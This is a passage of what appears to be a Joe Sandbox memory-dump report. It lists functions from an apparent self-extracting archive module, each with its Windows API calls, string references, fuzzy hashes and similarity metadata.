.inf, xrefs: 000FD89A

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 7ffcb2b04ece8e1f05b540a516887eab1eabca57b1ac54405628530ac0b975c6
Instruction ID: 1db3c4240daa3c418cf88241411137d73d1ccd7b530399b91a977451e1115d7e
Opcode Fuzzy Hash: 7ffcb2b04ece8e1f05b540a516887eab1eabca57b1ac54405628530ac0b975c6
Instruction Fuzzy Hash: 17510870408388AEDB709F64D844BBBBBE6AF81744F04041FF6C1979A1DBB18985EB52

Uniqueness

Uniqueness Score: -1.00%

Function 0010A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001057FB,001057FB,?,?,?,0010ABAC,00000001,00000001,2DE85006), ref: 0010A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0010ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0010AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0010AB35
__freea.LIBCMT ref: 0010AB42

Part of subcall function 00108E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00104286,?,0000015D,?,?,?,?,00105762,000000FF,00000000,?,?), ref: 00108E38

__freea.LIBCMT ref: 0010AB4B
__freea.LIBCMT ref: 0010AB70

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 67d4464515291194e00f9d20ca055b17a8eeb372cf39b185d50da57f7b020524
Instruction ID: cce1647369388a0cb48bd0363d871e27d710d1c0e034b34a65a142961241829b
Opcode Fuzzy Hash: 67d4464515291194e00f9d20ca055b17a8eeb372cf39b185d50da57f7b020524
Instruction Fuzzy Hash: 5251C072600316ABDB298E64CC41EBFB7AAEF54750F954629FC84D71C0EBB4DC90C692

Uniqueness

Uniqueness Score: -1.00%

Function 00103B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,00103C35,00000000,00000FA0,00142088,00000000,?,00103D60,00000004,InitializeCriticalSectionEx,00116394,InitializeCriticalSectionEx,00000000), ref: 00103C03

Strings

api-ms-, xrefs: 00103BC3

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: a416fb2157c6a98c0256ffae022d22ab4505013aa914fca3648dd9c93e06c01c
Instruction ID: 6378b8220c7e03a109397c15080eb65b265474bc25a03b802c77cd369ab12d53
Opcode Fuzzy Hash: a416fb2157c6a98c0256ffae022d22ab4505013aa914fca3648dd9c93e06c01c
Instruction Fuzzy Hash: 06110A31A45220ABCB328B589C4179977A89F01774F150111F8B5FB2D4D7B1EF4086D0

Uniqueness

Uniqueness Score: -1.00%

Function 000FAC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000F081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000F0836
Part of subcall function 000F081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000EF2D8,Crypt32.dll,00000000,000EF35C,?,?,000EF33E,?,?,?), ref: 000F0858

OleInitialize.OLE32(00000000), ref: 000FAC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 000FAC66
SHGetMalloc.SHELL32(00128438), ref: 000FAC70

Strings

riched20.dll, xrefs: 000FAC1E
3To, xrefs: 000FAC47

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3To
API String ID: 3498096277-2168385784
Opcode ID: dab1fc9716348ddd42e1909d9ac3893188999cca2c8ebb55df40606c94227219
Instruction ID: 61be7667943a39e83f86be4381d8da85ade1d25c3e0aa77d67620a48e57db891
Opcode Fuzzy Hash: dab1fc9716348ddd42e1909d9ac3893188999cca2c8ebb55df40606c94227219
Instruction Fuzzy Hash: 10F06DB5D00209ABCB10AFA9D8499EFFFFCEF85700F10411AE511E2251CBB456468FA1

Uniqueness

Uniqueness Score: -1.00%

Function 000EF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000F081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000F0836
Part of subcall function 000F081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000EF2D8,Crypt32.dll,00000000,000EF35C,?,?,000EF33E,?,?,?), ref: 000F0858

GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 000EF2E4
GetProcAddress.KERNEL32(001281C8,CryptUnprotectMemory), ref: 000EF2F4

Strings

Crypt32.dll, xrefs: 000EF2CE
CryptProtectMemory, xrefs: 000EF2DE
CryptUnprotectMemory, xrefs: 000EF2EA

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 9c33278f453bff2c4eee1d17e607307e51ffbac2a41afc8794c682c623f6ffa1
Instruction ID: aeaf055a299a7ac76a17e0783175e9ce4bbca353121debc8555ca97d6f1e8830
Opcode Fuzzy Hash: 9c33278f453bff2c4eee1d17e607307e51ffbac2a41afc8794c682c623f6ffa1
Instruction Fuzzy Hash: E1E04F719507429EC7259F35A949B917AD46F08700B14C82DF0EAE3A45EBB5D5C18B50

Uniqueness

Uniqueness Score: -1.00%

Function 000E98E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,000E7760,?,00000005,?,00000011), ref: 000E995F
GetLastError.KERNEL32(?,?,000E7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000E996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,000E7760,?,00000005,?), ref: 000E99A2
GetLastError.KERNEL32(?,?,000E7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000E99AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,000E7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000E99F9

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 52cf9aadc4b8c53aaadef5c3bb215fe9096ee9cdaff19d391c4d58e5d4400506
Instruction ID: 7f59c13218e9b43f5a958fb4769170997911608bb1c93c065f84791f63a6438b
Opcode Fuzzy Hash: 52cf9aadc4b8c53aaadef5c3bb215fe9096ee9cdaff19d391c4d58e5d4400506
Instruction Fuzzy Hash: 5D310230544785AFE7309F29CD46BEABBD4BB04320F200B19F9A1A65D2D7B4A984CB91

Uniqueness

Uniqueness Score: -1.00%

Function 000FABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 000FABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 000FABF9

Part of subcall function 000F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,000EC116,00000000,.exe,?,?,00000800,?,?,?,000F8E3C), ref: 000F1FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 000FABE9

Strings

EDIT, xrefs: 000FABCD, 000FABD8, 000FABE5

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: c4a8e3b034245714109854b8fbfcb6448538befa096a02a1282e61b2f1bd5728
Instruction ID: 82048e7c2acb2bb49d089c15ccc196c65194c24ac881e9f9906183285d76e396
Opcode Fuzzy Hash: c4a8e3b034245714109854b8fbfcb6448538befa096a02a1282e61b2f1bd5728
Instruction Fuzzy Hash: 47F0E27270022C7BDB3096649C0AFEB72AC9F43B10F480121BA04B30C0D760DA81C5B6

Uniqueness

Uniqueness Score: -1.00%

Function 000FDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 000FDBF4
SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 000FDC30

Strings

sfxpar, xrefs: 000FDC2B
sfxcmd, xrefs: 000FDBEF

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 49bb4a9410e9d7777516f815b733d48e28448cd203736e2feb53e7601dea3ac0
Instruction ID: 783e1990c5f934848fa4c544427f8bea6b43d7932eac71557036bdf8a8a35b8a
Opcode Fuzzy Hash: 49bb4a9410e9d7777516f815b733d48e28448cd203736e2feb53e7601dea3ac0
Instruction Fuzzy Hash: 10F0A7B240422DB6DB211B948C06BFA3B99AF04B81B044412BE8596452D7F09980F6E0

Uniqueness

Uniqueness Score: -1.00%

Function 000E9785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 000E9795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 000E97AD
GetLastError.KERNEL32 ref: 000E97DF
GetLastError.KERNEL32 ref: 000E97FE

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: dc992ef3048ff4400ecb8652e619b81552e4e65937949cab040a96250134ae73
Instruction ID: 29a10c192b63abcc7a27dca640fadd46849e17512d1599b9e683af714e9c1fac
Opcode Fuzzy Hash: dc992ef3048ff4400ecb8652e619b81552e4e65937949cab040a96250134ae73
Instruction Fuzzy Hash: 9111C230914244EFDF709F27CA046AD77E8FB46360F108529F466A55A0DB708E88DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0010AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,001040EF,00000000,00000000,?,0010ACDB,001040EF,00000000,00000000,00000000,?,0010AED8,00000006,FlsSetValue), ref: 0010AD66
GetLastError.KERNEL32(?,0010ACDB,001040EF,00000000,00000000,00000000,?,0010AED8,00000006,FlsSetValue,00117970,FlsSetValue,00000000,00000364,?,001098B7), ref: 0010AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0010ACDB,001040EF,00000000,00000000,00000000,?,0010AED8,00000006,FlsSetValue,00117970,FlsSetValue,00000000), ref: 0010AD80

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 3dca129a6facf07d20bba7eae54440ba9a8a42531335c1e31ae4e290b5297871
Instruction ID: 0f200307a0c4e0674de6184b2f73c87242033842458e805d1ea4dc9c7ddc6d3e
Opcode Fuzzy Hash: 3dca129a6facf07d20bba7eae54440ba9a8a42531335c1e31ae4e290b5297871
Instruction Fuzzy Hash: 4E017B36211332ABC7258BB8DC44A97BFA8EF057A37514220F896D39D0C770C841C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 000EF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 000EF2C5: GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 000EF2E4
Part of subcall function 000EF2C5: GetProcAddress.KERNEL32(001281C8,CryptUnprotectMemory), ref: 000EF2F4

GetCurrentProcessId.KERNEL32(?,?,?,000EF33E), ref: 000EF3D2

Strings

CryptUnprotectMemory failed, xrefs: 000EF3CA
CryptProtectMemory failed, xrefs: 000EF389

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: c8a5ac41fa0dd60adb03e30e10a0493e7709948ce6c00c700c575d2e5f51fd98
Instruction ID: 720a4c8c21be6e089155e51ca183b0f14d4b8744ce2664ecb6b45dbd467a4b2e
Opcode Fuzzy Hash: c8a5ac41fa0dd60adb03e30e10a0493e7709948ce6c00c700c575d2e5f51fd98
Instruction Fuzzy Hash: C0117B31A016A6AFDF29AF32ED056BE3B94FF00750B108166FC057B292DB709F518780

Uniqueness

Uniqueness Score: -1.00%

Function 000F101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 000F1043
SetThreadPriority.KERNEL32(?,00000000), ref: 000F108A

Part of subcall function 000E6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E6C54

Strings

CreateThread failed, xrefs: 000F104F

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: ce8c8eaa98f8961519668eed75f6093ba2ad4a31b1027d0beebedb0951aeb04d
Instruction ID: a1a2ac7e57b4485a3d822f8417c3b721ae76b4430983b6794a56ddc05b658625
Opcode Fuzzy Hash: ce8c8eaa98f8961519668eed75f6093ba2ad4a31b1027d0beebedb0951aeb04d
Instruction Fuzzy Hash: 9D01F2B5344349BFD3349E24AD41BF6B399EB50750F20002EF68662681CEE2A8848228

Uniqueness

Uniqueness Score: -1.00%

Function 000E9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,000ED343,00000001,?,?,?,00000000,000F551D,?,?,?), ref: 000E9F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,000F551D,?,?,?,?,?,000F4FC7,?), ref: 000E9FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,000ED343,00000001,?,?), ref: 000EA011

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 9fc36149faaa110d2b73667fe8745581a1bd9d9eb95b18df69d27afe27ead3d3
Instruction ID: 508c4376b0c5ea7db7b386e34cc9eaaa517d1c6c521f5ef4d76d997257f0e04c
Opcode Fuzzy Hash: 9fc36149faaa110d2b73667fe8745581a1bd9d9eb95b18df69d27afe27ead3d3
Instruction Fuzzy Hash: 2F31D331204385AFDB14CF21D908BAE77A5FF99711F04492DF981B7290C775AD88CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 000EA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 000EC27E: _wcslen.LIBCMT ref: 000EC284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA30C
GetLastError.KERNEL32(?,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA329

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 1c248a0f13841886da58ecf144705c5e3273c532b7845d66ae3506389962fbe4
Instruction ID: cbf265fb3df0b7912b96eba988e37239991f651c663b67de70b68092f9e4d4e2
Opcode Fuzzy Hash: 1c248a0f13841886da58ecf144705c5e3273c532b7845d66ae3506389962fbe4
Instruction Fuzzy Hash: B101B531300294AEEF61AB774C09BFE32C89F0F780F048419F901F6092D754EB8186B2

Uniqueness

Uniqueness Score: -1.00%

Function 0010B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0010B8B8

Strings

, xrefs: 0010B8FD

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 3cb5c348a78b3a4158a645fcb550b8a60a5a5c37344ca0cf8ae51dd7c6f0bf5f
Instruction ID: f244ad5b06b52859d6b53aeee58a987223cdd9d00fe6d9d775393a56980aab55
Opcode Fuzzy Hash: 3cb5c348a78b3a4158a645fcb550b8a60a5a5c37344ca0cf8ae51dd7c6f0bf5f
Instruction Fuzzy Hash: 744119B050834C9EDF258E648CC4BF6BBA9EF55308F1404EDE6DA87182D3B59A45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0010AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0010AFDD

Strings

LCMapStringEx, xrefs: 0010AF7D, 0010AF87

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

